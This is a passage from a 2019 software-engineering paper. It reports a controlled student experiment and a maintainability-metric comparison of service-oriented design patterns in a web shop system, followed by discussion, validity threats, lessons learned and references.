Mean 01:15:30 (4,530 s) 01:03:39 (3,819 s) SD 00:10:20 (620 s) 00:18:18 (1,098 s) Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 12/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ significant level. When performing the same test for the three tasks individually, the resulting p-values are 0.741 (task#1), 0.082 (task#2), and 0.0006 (task#3) respectively. This means that with our Bonferroni-corrected significance level of p � 0.01 (desired significance level divided by the number of hypotheses ⇒ a = 0.05/5 = 0.01) we could only reject H023 and identify support for H123 (task#3, patterns: Event-Driven Messaging/ Inversion of Communications). A post-hoc power analysis for our only successful hypothesis test (i.e. the probability that the test correctly rejected the null hypothesis) revealed that the statistical power is sufficient (0.931). As pointed out, all other four null hypotheses (H011, H021, H022, H024) could not be rejected. METRIC ANALYSIS For a second comparison of the two system versions, we chose and collected measurements for nine different maintainability metrics (see Table 6) related to structural design properties such as size, complexity, and coupling from the final systems (post-experiment optimal solutions, see Figs. 2 and 4). Some of these metrics are pretty simple (e.g. # of Services or Lines of code (LOC)). Since a number of more sophisticated maintainability metrics specifically designed for service orientation have been suggested in scientific literature (Bogner, Wagner & Zimmermann, 2017), we also chose some of these (e.g. service interface data cohesion (SIDC) or absolute dependence of the service (ADS)). All metrics (except for # of Services) were collected per service and then aggregated to the system level with aggregation functions such as SUM, MEAN, or MAX. Before we 1832 2110 2381 1847 1567 765 # 1 : P ro c e s s A b s tra c tio n # 2 : S e rv ic e F a c a d e # 3 : E v e n t− D riv e n M e s s a g in g #1 (no patterns) #2 (patterns) 1000 2000 3000 4000 5000 1000 2000 3000 4000 5000 1000 2000 3000 4000 5000 Group / Version D u ra ti o n i n s e c Task Number #1: Process Abstraction #2: Service Facade #3: Event−Driven Messaging Figure 5 Boxplot comparison of the duration per version and task. Full-size DOI: 10.7717/peerj-cs.213/fig-5 Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 13/25 http://dx.doi.org/10.7717/peerj-cs.213/fig-5 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ describe the detailed metric results, we briefly present the selected metrics, explain our rationale for choosing them, and point out how they were collected. Metric definitions In the area of size and granularity, we selected four metrics. The premise with these metrics is that a smaller system with appropriate service granularity (not too many services, not too large services) will be easier to understand and maintain. The first one was # of Services, which already is a proxy for system size and therefore does not need to be aggregated. So, if we assume unchanged granularity, fewer services are generally easier to grasp and maintain. We manually derived # of Services from the final architecture diagrams. In both versions, the WebUI was counted as a service while in the pattern version #2, the Kafka broker was not counted as a service, as it does not contain custom code and is an infrastructure component. As a second metric, we selected the prevalent LOC metric that we collected for each service via the static analyzer SonarQube (https://www.sonarqube.org). We then created system-level LOC aggregates with SUM, MEAN, MEDIAN, and MAX. Since LOC is sometimes seen as controversial (e.g. if several programming languages are involved), we also selected a volume metric specifically designed for service orientation, namely the weighted service interface count (WSIC) by Hirzalla, Cleland-Huang & Arsanjani (2009). WSIC represents the count of publicly available operations in a service interface with possible weights for different types of operations (e.g. synchronous and asynchronous). We used the standard weight of 1, which is basically the same as # of Operations. Values for WSIC were automatically derived from the existing OpenAPI (https://github.com/OAI/ OpenAPISpecification) files with a self-developed analysis tool. Like LOC, WSIC was also aggregated with SUM, MEAN, MEDIAN, and MAX. To gain further granularity-related insights in addition to the means and medians of our two volume metrics, we also calculated their ratio, that is, LOC/WSIC. For a given service, this represents the number of LOCs that are on average necessary to provide a single Table 6 List of the nine selected maintainability metrics to analyze both versions. Metric name Design property Source # of services Size – Lines of code (LOC) Size – Weighted service interface count (WSIC) Size Hirzalla, Cleland-Huang & Arsanjani (2009) LOC/WSIC Granularity – Cyclomatic complexity (CC) Complexity McCabe (1976) Service interface data cohesion (SIDC) Cohesion Perepletchikov (2009) Absolute dependence of the service (ADS) Coupling Rud, Schmietendorf & Dumke (2006) Relaxed ADS Coupling – Absolute importance of the service (AIS) Coupling Rud, Schmietendorf & Dumke (2006) Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 14/25 https://www.sonarqube.org https://github.com/OAI/OpenAPISpecification https://github.com/OAI/OpenAPISpecification http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ operation. Larger values for LOC/WSIC mean a service has large and potentially complex operations. This metric was aggregated with MEAN, MEDIAN, and MAX. As a measure for complexity, we selected cyclomatic complexity (CC) from McCabe (1976) as a traditional source code metric. While some suggestions for service-based complexity metrics like response for operation (Perepletchikov et al., 2007) or Message Entropy (Mateos et al., 2017) exist, tool support for their collection is not available and they are hard to calculate manually. Despite its criticisms (Ostberg & Wagner, 2014), we therefore relied on the widely used CC metric that was gathered for each service via SonarQube. We then subsequently aggregated the values with MEAN, MEDIAN, and MAX. Lower values for CC suggest that a service is easier to understand and maintain. In the context of cohesion, we chose the SIDC metric proposed by Perepletchikov (2009). SIDC rates the cohesion of a service interface in percent based on the input and response parameter data types of its operations. If a service interface operates on the same or only a small set of data abstractions (e.g., CRUD operations for a Customer entity), the values for SIDC will be closer to 100% and the service will be easier to analyze and change. We used the already mentioned OpenAPI analysis tool to automatically calculate the percentage values for SIDC. These values were then aggregated with MEAN, MEDIAN, and MIN (as lower values are worse). The last maintainability-related design property that we wanted to measure was coupling. In the service-oriented space, “loose coupling” is a prevalent theme aiming to reduce the number and strength of service dependencies and therefore preventing or mitigating ripple effects on changes (Pautasso & Wilde, 2009). We therefore chose three metrics to analyze the degree of coupling in both versions, where lower values mean less coupling and therefore increased maintainability. All coupling metrics were manually derived from the final architecture diagrams that also include the dependencies between services. Moreover, the same aggregations were used for all of them, namely MEAN, MEDIAN, and MAX. First, we selected the ADS metric proposed by Rud, Schmietendorf & Dumke (2006). For a given service, ADS represents the number of other services that this service depends on, that is, of which it invokes at least one operation. For pattern version #2, dependencies to the Kafka broker were counted as well. Since ADS treats every static dependency exactly in the same way, we also collected values for an adjusted variant of ADS that respects looser types of coupling. In that sense, Relaxed ADS works like ADS, except that dependencies to a Service Façade or the Kafka broker were counted with 0.5 instead of 1. The rationale for this was that these two patterns are introduced as intermediaries to reduce coupling. As a consequence, dependencies to them should not be weighted in the same way as direct invocations of services. In version #1 of the system, the values for Relaxed ADS are therefore exactly the same as for ADS. Only in the pattern version #2, the values for the two variants differ. The third and last coupling metric, also proposed by Rud, Schmietendorf & Dumke (2006), is complementary to ADS, namely the metric absolute importance of the service (AIS). For a given service, AIS represents the number of other services that have a dependency to this service, that is, that invoke at least one of its operations. Since the invocation origin is not really important, we did not gather a Relaxed AIS variant. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 15/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ Metric results To compare the two system versions, we only present the aggregated system-level metrics in this paper (see Table 7). For a detailed comparison of the underlying service-level metrics, please refer to the metric evaluation spreadsheet in our repository (https://github. com/xJREB/researchmodifiability-pattern-experiment/blob/master/_results/metric- analysis.xlsx) that includes the measurements for each service. When comparing the system-level metrics for size, we immediately see that pattern version #2 is larger. It has two more services (OrderProcessSrv and Table 7 System-level metric results per version (Change in % refers to the change of the metric value from V1 to V2; a positive percentage means V1 is better, a negative one means V2 is better; in cases with a change of at least 15%, the better version is marked with a colored background). Metric Aggregate Version #1 (no patterns) Version #2 (patterns) Change in % # of services – 7 9 28.6 LOC SUM 2,555 3,303 29.3 MEAN 365 367 0.5 MEDIAN 324 362 11.7 MAX 591 668 13.0 WSIC SUM 32 47 46.9 MEAN 5.33 5.88 10.2 MEDIAN 5 5 0.0 MAX 9 12 33.3 LOC/WSIC MEAN 79.09 105.77 33.7 MEDIAN 77.33 71.73 -7.2 MAX 112.40 373.00 231.9 CC MEAN 48.57 48.44 -0.3 MEDIAN 50.00 48.00 -4.0 MAX 93 100 7.5 SIDC MEAN 0.370 0.374 -1.2 MEDIAN 0.40 0.40 0.0 MIN 0.16 0.16 0.0 ADS MEAN 1.57 1.56 -1.0 MEDIAN 1 1 0.0 MAX 5 4 -20.0 Relaxed ADS MEAN 1.57 1.28 -18.7 MEDIAN 1 0.5 -50.0 MAX 5 3.5 -30.0 AIS MEAN 1.57 1.22 -22.2 MEDIAN 1 1 0.0 MAX 3 3 0.0 Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 16/25 https://github.com/xJREB/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xJREB/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx https://github.com/xJREB/researchmodifiability-pattern-experiment/blob/master/_results/metric-analysis.xlsx http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ ProductSrvFaçade) and therefore consists of ∼29% more LOC and ∼47% more operations. Even though the Kafka broker is also new in version #2, it is not counted as a service. While MEAN and MEDIAN for the size metrics are only slightly worse or stay roughly the same in version #2, the MAX value for WSIC increases by ∼33% (from nine to 12 operations). This is due to the newly introduced ProductSrvFaçade that relays calls to the ProductSrv, CategorySrv, and WarehouseSrv. Lastly, the introduction of the OrderProcessSrv in version #2 impacted the LOC/WSIC ratio. While the MEDIAN is slightly better for version #2 (∼7%), both the MEAN value (∼34%) and the MAX value (∼232%) are worse. The reason for this is that the OrderProcessSrv provides only a single operation while simultaneously consisting of slightly above average LOC. For both complexity and cohesion, our chosen metrics do not show much differences between the two versions. CC aggregates are very similar, with the only notable difference being a slightly larger MAX value (∼8%) for version #2. This is caused by adding the messaging functionality to the NotificationSrv. Aggregates for SIDC are even more similar, which suggests that the patterns at hand do not influence service cohesion all that much. The only design property that seems slightly better in pattern version #2 is coupling. While the MEAN and MEDIAN aggregates of ADS stay the same in both version, the MAX value in version #2 has been reduced by 20%: the ProductSrvFaçade shields the services behind it so that the WebUI has one dependency less (four instead of five). If we treat looser forms of coupling differently, version #2 improves even further. For Relaxed ADS, all aggregates are better in the pattern version (MEAN by ∼19%, MEDIAN by 50%, and MAX by 30%), because the Kafka broker and ProductSrvFaçade reduce the weight of service dependencies. Finally, even though the MEDIAN and MAX aggregates for AIS are the same in both versions, the MEAN value is improved by ∼22% in version #2. This is caused by the Event-Driven Messaging/Inversion of Communications patterns. The Kafka broker does not actively call services, but services have to publish or subscribe to it. Therefore, the SUM values for ADS and AIS would also be different in version #2, even though they would be the same in version #1. DISCUSSION From the experiment results, we could not derive support for the majority of our hypotheses that service-based patterns had a positive impact on participant effectiveness and efficiency. The mean difference in duration was only significant for task #3 in isolation. We offer three main interpretations to explain these results. One straightforward possibility is that the patterns of task #1 (Process Abstraction) and task #2 (Service Façade and Decomposed Capability) were simply not effective enough to enhance the modifiability of the system under test. Their theoretical benefit for the chosen evolution scenario did not (or only partially) translate to a practical setting. Only Event-Driven Messaging/Inversion of Communications from task #3 led to a significant advantage for the system’s evolvability. While this seems plausible at first sight and our chosen patterns may certainly differ in their effectiveness, we believe that our second and third interpretations are more likely. Another explanation for the results may be that the effect of familiarization and experience was stronger for the pattern version #2. As they progressed through the tasks, Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 17/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ participants naturally grew more accustomed to the system and workspace environment. Since the pattern version #2 exhibited a higher base complexity (more services, more inter-service communication, more build scripts to start before task validation), participants of this group were initially slowed down more than the control group. Over the course of the experiment, they gradually adjusted to this so that the effectiveness of the chosen patterns for the evolution scenario could unfold (slightly in task#2 and fully in task#3). This effect could have been weakened by randomizing the order of tasks per participant. Unfortunately, this was not possible because tasks depended on each other. We also offer a possible third explanation in conjunction with the familiarization effect. The patterns’ effect on modifiability seems to have been influenced by whether participants had conscious knowledge of and experience with patterns beforehand. When we analyzed existing correlations between effectiveness and self-reported experience-related factors, we observed that both knowledge of general design patterns as well as service-oriented patterns was more strongly correlated with effectiveness in the pattern group #2 than in group #1: about 19% more for general patterns (Kendall’s tau: 0.485 vs 0.579) and about 242% more for service-oriented ones (r-values: 0.093 vs 0.318). Years of programming experience, for example, was similarly correlated with effectiveness in both groups (r-values: 0.509 vs 0.497). So using students instead of experienced professionals who have worked with patterns before seems to have hurt treatment group #2 more. The potential modifiability-related benefit of a pattern may be lessened or even negated by its complexity and impact on understandability, if the participant is not familiar with the pattern. Potential support for this can be found by narrowing down the sample for both groups to only the best participants. When we filter for only the 26 students that solved at least task #1 and task #2 (effectiveness � 67%), the mean efficiency difference increases: instead of ∼12%, participants of pattern group #2 now needed ∼31% less time per task. Overall, the results suggest that the theoretical evolvability-related advantage of service-oriented patterns is difficult to replicate in controlled experiments: familiarity with the system and experience with the selected patterns seem to have an impact on the patterns’ effectiveness. For inexperienced developers unfamiliar with the system, the additional complexity introduced by the patterns seems to reduce or even outweigh the theoretical positive effect on modifiability. Implications of such a conclusion could be that appropriate documentation of used service-oriented patterns as well as thorough pattern-focused initial training of new developers become all the more important to ensure a long-term and sustainable effect of patterns on software evolvability. With respect to the metric analysis, we observed that the pattern version #2 is worse in the area of size and granularity and better for coupling. Our chosen complexity and cohesion metrics are not impacted by the patterns. When counting only changes in metric values of at least 15%, version #1 is superior for six size and granularity aggregates (# of Services, LOCSUM, WSICSUM, WSICMAX, LOC/WSICMEAN, and LOC/WSICMAX), while version #2 is better for five coupling aggregates (ADSMAX, Relaxed ADSMEAN, Relaxed ADSMEDIAN, Relaxed ADSMAX, and AISMEAN). However, three of these five improvement areas for version #2 are aggregates of Relaxed ADS, a metric that we specifically Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 18/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ constructed for the loose coupling nature of the used patterns. Without Relaxed ADS, the pattern version would only be significantly better for two coupling aggregates (ADSMAX and AISMEAN). All in all, the comparison of structural metrics showed no decisive maintainability improvements in the pattern version, which seems to be in line with the experiment results. The increased system size and slightly worsened granularity in version #2 may support our interpretation that it took longer in this group until the familiarization effect kicked in. More services and operations meant that participants were potentially under higher cognitive load and required more effort to get familiar with the system. Lastly, the partially improved coupling measurements in the pattern version could explain why participants in this group required less time for task#2 and especially task#3: these tasks relied on the patterns Service Façade and Event-Driven Messaging, which are both related to decoupling. THREATS TO VALIDITY Threats to validity have to be examined in several areas of this empirical study. With respect to construct validity, our operationalized experiment measure (namely the time necessary to implement a feature) seems valid to represent the construct in a practical real-world setting. Efficiency is one of the most used measures for software engineering experiments and, in contrast to maintainability metrics, it is not a structural approximation of this quality attribute. Effectiveness, that is, the degree to which participants solved all tasks within the given time frame, is a similarly popular measure in software development, even though efficiency is more relevant in a real-world industry setting. Most often, it is not the question, if something can be implemented, but how long it will take. Lastly, the results of the metric analysis rely on the maintainability prediction quality of the chosen metrics. Several of these metrics (e.g. LOC or CC) are well-known and have been extensively studied, but especially some of the younger service-oriented metrics have not been evaluated in or accepted by large-scale industry environments. So, while the chosen design properties seem very fitting for a service-oriented context, the metrics selected to represent them may be of differing quality. Similarly, only a limited number of metrics was analyzed and there is always the possibility for more or different metrics. Internal validity is concerned with how much the treatment was actually responsible for the observed effect and if there were unknown factors that influenced the results. During the experiment discussion, we already mentioned the observed impact of the participants’ pattern knowledge on the effective modifiability of the patterns. A possible solution to this could have been to only accept participants with a base-level of pattern experience or to include a small lecture on service-oriented patterns in the introductory presentation. We also already described the familiarization effect for later tasks, which makes it harder to analyze the effectiveness of each individual pattern. Task randomization as a solution to this was not possible because the task order was important in the constructed evolution scenarios. Furthermore, participants were forced to use the provided experiment workspace via a virtual machine. While most students should be somewhat familiar with Eclipse, their Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 19/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ preferred IDE, OS, or build tool may be different from the provided environment. This could have hindered their development speed. We have to assume that this effect was similar for each group and task. Moreover, participants were allowed to ask questions, if they were not related to the actual coding, but to the experiment environment (e.g., IDE, build tool, and evaluation UI). A last potential threat in this area is the general coding ability of participants that may tamper with the results: students that are very slow/fast in general work with similar speed regardless of the group. Since participants only worked on one version in our experiment, an uneven distribution of very slow/fast students could have affected the groups’ mean efficiency. While our population of 69 has a smaller risk to be influenced by this than for example, 20 participants and our post-experiment survey did not reveal major experience differences between the groups, the self-reported nature of the comparison still leaves some room for issues. Possible solutions could have been to conduct a pilot evaluation study with the participants to divide them into two groups of similar skill or to let participants work on tasks from both groups in a rotating manner. Both solutions were not used because of time and effort constraints. Concerning the metric analysis, we relied on the correctness of the collected measurements. More complex metrics were gathered automatically with tool support while simple metrics were manually derived (e.g. from architecture diagrams) and double-checked across researchers. Even though it is not very likely, there still remains the small possibility of incorrect metric values that may have clouded the analysis. External validity refers to the generalizability of the results to the target population and setting. While the usage of students may be a valid proxy for the desired target population in many cases, our experiment was very challenging for Bachelor students. Only ∼25% solved all three tasks and ∼30% could not solve any task. We also hypothesize that the missing degree of pattern experience influenced the treatment group’s effectiveness and efficiency. Therefore, we expect that a replication with experienced software professionals from industry would yield different results. However, such a replication with a sufficient number of participants is extremely difficult to organize. We created both versions of the web shop system as close to the real world as possible. Nonetheless, controlled experiment tasks are still inherently of a somewhat artificial nature with the potential for subjective bias. The experiment results are also bound to the used programming language (Java) and service-based communication style (RESTful HTTP). Moreover, we designed the tasks with the intuitive feeling that the pattern version #2 might be faster to change, because the patterns are perfectly suited for the changes at hand. The benefit of a pattern will always heavily depend on the specifics of the evolution scenario that is performed. In conjunction with this, developers are usually decently familiar with the system that they extend. So, in a real world software maintenance scenario, the benefits of modifiability mechanisms and patterns often manifest over a long period of time with increasing developer familiarity with the system. The artificial construction of the two system versions may also have impacted the reliability of the metric-based analysis. After all, we evaluated the internal quality of artifacts that were created by ourselves, which leaves possibilities for researcher bias. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 20/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ To mitigate these threats, metric collection was performed by external research assistants (see “Acknowledgments”) and the final set of metrics was not known during the system construction period. Nonetheless, using several existing industry or open source systems for the metric-based analysis of patterns would have provided more objective results. In the case of our study, however, the goal of the evaluation with metrics was to provide a second perspective on the two experiment system versions. Lastly, one must be very careful to generalize from the results of four patterns, a total of 69 student participants, and nine metrics to all patterns and software developers. The controlled experiment presents first empirical insights for the modifiability of selected service-oriented patterns with inexperienced human participants, while the metric study provides additional structural insights that aim to further the understanding of the patterns’ effects. However, many more similar studies should follow to either support or reject the conclusions of this research. LESSONS LEARNED FROM THE EXPERIMENT We experienced a number of limitations with our experiment design that hindered our means for analysis and interpretation. To aid future controlled experiments in the area of design patterns’ impact on modifiability and to prevent researchers from repeating the same mistakes, we documented some lessons learned. First, tasks should not depend on each other. This allows to randomize task order per participant to lessen the familiarization effect and analyze the impact of individual patterns. Furthermore, you can then set fixed maximum durations per task which ensures participants work on all tasks. This may obviously decrease the overall number of solved tasks though, especially if they are difficult. Another suggestion is to conduct a pilot experiment with similar tasks to rate participants. This rating can then be used to randomly draft individuals to ensure similarly skilled groups. As a less time-consuming alternative, a survey with self-reported skill can be used. If a pre-experiment study is not possible, tasks could be designed to allow participants to work on both versions of the system in alternating fashion. An even number of tasks should be chosen in this case. Lastly, it is strongly advised to ensure participants’ familiarity with the patterns. Otherwise their effect will be reduced. In combination with this, the most realistic software maintenance/evolution scenario requires that participants are already familiar with the system to a certain degree. This could be achieved by using an existing system and its developers. A second version would need to be constructed though. If no fitting existing system is identified and time allows it, a long-term familiarization period with artificial systems could be used before the actual experiment. CONCLUSION To analyze the impact of service-oriented design patterns on software evolvability, we conducted a controlled experiment with 69 Bachelor students. Participants had to change and extend a service-based web shop system in two functionally equivalent versions over the course of three tasks. We measured effectiveness and efficiency per group. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 21/25 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ While median effectiveness was the same for both groups (1/3), we saw differences for the mean efficiency, that is, mean duration per task. Participants in the treatment group with patterns were about 12% faster (00:32:45 vs 00:28:50), but due to Bonferroni correction not at a statistically significant level (p-value: 0.0496). When analyzing each individual task, we found only the group difference for task #3 (pattern: Event-Driven Messaging) to be of a significant nature (p-value: 0.0006). Here, participants in the treatment group needed about 51% less time. During the subsequent analysis of the two system versions with nine maintainability metrics, the pattern version #2 exhibited worse measurements in the area of size and granularity and better measurements for coupling, even though the most improved coupling metric was specifically designed for the patterns’ type of dependency (Relaxed ADS). Complexity as well as cohesion measurements were similar between the two versions. Overall, we did not observe decisive maintainability metric improvements in the pattern version, which seems to be in line with the experiment results. Our interpretation of these results is that we have no clear indication that three of the four selected service-based patterns were beneficial for evolvability. We theorize, however, that the additional volume introduced by the patterns hindered participants to leverage their modifiability-related benefits at first, which seems to be supported by the size and granularity metrics. Over the course of the experiment, participants became more and more familiar with the system and the patterns, which allowed the treatment group to get a slight edge in task #2 and finally produced full statistical significance in task #3. The implications of these results are that documentation and training of used service-based patterns should not be neglected in software maintenance and evolution scenarios. With respect to possible future work, we already mentioned the lack of empirical quantitative research on service-oriented patterns and QAs (in our case evolvability). It is therefore necessary that future research provides additional support in this area. Many patterns for SOA and also some for Microservices are available and one study can only cover so many of them. Moreover, additional research could also aim to confirm and quantify the impact of developers’ pattern experience on the effectiveness of the patterns. Additionally, the metric-based analysis of patterns could be extended to existing industry or open source systems to mitigate the construction bias. As an alternative, several practitioners or external researchers could implement systems with these patterns to allow for a more objective analysis. To support such endeavors and to enable potential replication studies, we shared all artifacts related to the experiment and metric analysis on GitHub (https://github.com/xJREB/researchmodifiability-pattern-experiment) and Zenodo (DOI 10.5281/zenodo.3340971) (source code, task descriptions, survey questions, result data sets, analysis script). ACKNOWLEDGEMENTS We kindly thank Daniel Graziotin from the University of Stuttgart as well as Maximilian Jager from the University of Mannheim for the fruitful discussions about our paper and specifically about the used statistical methods. Furthermore, we thank Aretina Iazzolino, Philipp Meyer, and Daniel Quack (all from the University of Stuttgart) Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 22/25 https://github.com/xJREB/researchmodifiability-pattern-experiment https://doi.org/10.5281/zenodo.3340971 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ for their diligent support with the metric analysis. Lastly, we are very grateful for the constructive and detailed feedback provided by our reviewers. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded by the Ministry of Science of Baden-Württemberg, Germany, for the doctoral programme “Services Computing.” The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Ministry of Science of Baden-Württemberg, Germany. Competing Interests Justus Bogner is not only a PhD student, but also a software engineer at DXC Technology. Stefan Wagner and Alfred Zimmermann have no potential competing interests. Author Contributions � Justus Bogner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Stefan Wagner conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. � Alfred Zimmermann conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at Zenodo: Bogner, Justus. (2019). Data and Analysis Artifacts for Service-Based Evolvability Patterns (Experiment and Metrics) [Data set]. Zenodo. http://doi.org/10.5281/zenodo.3340972. REFERENCES Alexander C, Ishikawa S, Silverstein M. 1977. A pattern language: towns, buildings, construction. New York: Oxford University Press. Ali M, Elish MO. 2013. A comparative literature survey of design patterns impact on software quality. In: 2013 International Conference on Information Science and Applications (ICISA). Piscataway: IEEE. Bogner J, Wagner S, Zimmermann A. 2017. Automatically measuring the maintainability of service- and microservice-based systems. In: Proceedings of the 27th International Workshop on Software Measurement and 12th International Conference on Software Process and Product Measurement on—IWSM Mensura’17. New York: ACM Press. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 23/25 http://doi.org/10.5281/zenodo.3340972 http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ Bogner J, Wagner S, Zimmermann A. 2019. Using architectural modifiability tactics to examine evolution qualities of service- and microservice-based systems. SICS Software-Intensive Cyber-Physical Systems 34(2–3):141–149 DOI 10.1007/s00450-019-00402-z. Bogner J, Zimmermann A, Wagner S. 2018. Analyzing the relevance of SOA patterns for microservice-based systems. In: Proceedings of the 10th Central European Workshop on Services and their Composition (ZEUS’18). Dresden: CEUR-WS.org. Buschmann F, Meunier R, Rohnert H, Sommerlad P, Stal M. 1996. Pattern-oriented software architecture: a system of patterns. Chichester: Wiley Publishing, 476. Daigneau R. 2011. Service design patterns: fundamental design solutions for SOAP/WSDL and RESTful web services. Upper Saddle River: Addison-Wesley. Erl T. 2005. Service-oriented architecture: concepts, technology, and design. Upper Saddle River: Prentice Hall PTR. Erl T. 2009. SOA design patterns. Boston: Pearson Education. Erl T, Carlyle B, Pautasso C, Balasubramanian R. 2012. SOA with REST: principles, patterns & constraints for building enterprise solutions with REST. Upper Saddle River: Pearson Education. Falessi D, Juristo N, Wohlin C, Turhan B, Münch J, Jedlitschka A, Oivo M. 2018. Empirical software engineering experts on the use of students and professionals in experiments. Empirical Software Engineering 23(1):452–489 DOI 10.1007/s10664-017-9523-3. Fehling C, Leymann F, Retter R, Schupeck W, Arbitter P. 2014. Cloud computing patterns. Vienna: Springer. Fowler M. 2002. Patterns of enterprise application architecture. Boston: Pearson Education. Fowler M. 2015. Microservices resource guide. Available at http://martinfowler.com/microservices. Galster M, Avgeriou P. 2012. Qualitative analysis of the impact of SOA patterns on quality attributes. In: 2012 12th International Conference on Quality Software. Piscataway: IEEE. Gamma E, Helm R, Johnson R, Vlissides J. 1994. Design patterns: elements of reusable object-oriented software. Boston: Addison-Wesley, 395. Garzás J, García F, Piattini M. 2009. Do rules and patterns affect design maintainability? Journal of Computer Science and Technology 24(2):262–272 DOI 10.1007/s11390-009-9222-7. Hegedūs P, Bán D, Ferenc R, Gyimóthy T. 2012. Myth or reality? Analyzing the effect of design patterns on software maintainability. In: Kim T-h, Ramos C, Kim H-k, Kiumi A, Mohammed S, Ślęzak D, eds. Communications in Computer and Information Science. Berlin, Heidelberg: Springer, 138–145. Hirzalla M, Cleland-Huang J, Arsanjani A. 2009. A metrics suite for evaluating flexibility and complexity in service oriented architectures. In: International Conference on Service-Oriented Computing Workshops - ICSOCW’09. Vol. 4749. Berlin, Heidelberg: Springer, 41–52. Hohpe G, Woolf B. 2003. Enterprise integration patterns: designing, building, and deploying messaging solutions. Boston: Addison-Wesley Longman Publishing Co., Inc. Host M, Regnell B, Wohlin C. 2000. Using students as subjects—a comparative study of students and professionals in lead-time impact assessment. Empirical Software Engineering 5(3):201–214 DOI 10.1023/A:1026586415054. International Organization For Standardization. 2011. ISO/IEC 25010—systems and software engineering—systems and software quality requirements and evaluation (SQuaRE)—system and software quality models. System and Software Quality Models. Vol. 2. Available at https://www. iso.org/standard/35733.html. Jedlitschka A, Ciolkowski M, Pfahl D. 2008. Reporting experiments in software engineering. In: Guide to Advanced Empirical Software Engineering. London: Springer, 201–228. Bogner et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.213 24/25 http://dx.doi.org/10.1007/s00450-019-00402-z http://dx.doi.org/10.1007/s10664-017-9523-3 http://martinfowler.com/microservices http://dx.doi.org/10.1007/s11390-009-9222-7 http://dx.doi.org/10.1023/A:1026586415054 https://www.iso.org/standard/35733.html https://www.iso.org/standard/35733.html http://dx.doi.org/10.7717/peerj-cs.213 https://peerj.com/computer-science/ Kassab M, El-Boussaidi G, Mili H. 2012. A quantitative evaluation of the impact of architectural patterns on quality requirements. In: Lee R, ed. Software Engineering Research, Management and Applications 2011. Berlin, Heidelberg: Springer, 173–184. Mateos C, Zunino A, Misra S, Anabalon D, Flores A. 2017. Managing web service interface complexity via an OO metric-based early approach. CLEI Electronic Journal 20(3):2 DOI 10.19153/cleiej.20.3.2. McCabe TJ. 1976. A complexity measure. IEEE Transactions on Software Engineering SE-2(4):308–320 DOI 10.1109/TSE.1976.233837. Newman S. 2015. Building microservices: designing fine-grained systems. First Edition. Sebastopol: O’Reilly Media, 280. Ostberg J-P, Wagner S. 2014. On automatically collectable metrics for software maintainability evaluation. In: 2014 Joint Conference of the International Workshop on Software Measurement and the International Conference on Software Process and Product Measurement. Piscataway: IEEE, 32–37. Palma F, An L, Khomh F, Moha N, Gueheneuc Y-G. 2014. Investigating the change-proneness of service patterns and antipatterns. In: 2014 IEEE 7th International Conference on Service-Oriented Computing and Applications. Piscataway: IEEE. Papazoglou MP. 2003. Service-oriented computing: concepts, characteristics and directions. In: Proceedings of the 7th International Conference on Properties and Applications of Dielectric Materials (Cat. No.03CH37417), Piscataway: IEEE Computer Society, 3–12. Pautasso C, Wilde E. 2009. Why is the web loosely coupled? In: Proceedings of the 18th International Conference on World Wide Web—WWW’09. New York: ACM Press. Perepletchikov M. 2009. Software design metrics for predicting maintainability of service-oriented software. A thesis submitted in fulfilment of the requirements for the degree of doctor of philosophy, College of Science, Engineering and Health, RMIT University, Melbourne, Australia. Perepletchikov M, Ryan C, Frampton K, Tari Z. 2007. Coupling metrics for predicting maintainability in service-oriented designs. In: 2007 Australian Software Engineering Conference (ASWEC’07). Piscataway: IEEE. Riaz M, Breaux T, Williams L. 2015. How have we evaluated software pattern application? A systematic mapping study of research design practices. Information and Software Technology 65:14–38 DOI 10.1016/j.infsof.2015.04.002. Richardson C. 2018. Microservices patterns. Shelter Island: Manning Publications. Rotem-Gal-Oz A. 2012. SOA patterns. New York: Manning. Rowe D, Leaney J, Lowe D. 1998. Defining systems architecture evolvability—a taxonomy of change. In: International Conference on the Engineering of Computer-based Systems. Los Alamitos: IEEE, 45–52. Rud D, Schmietendorf 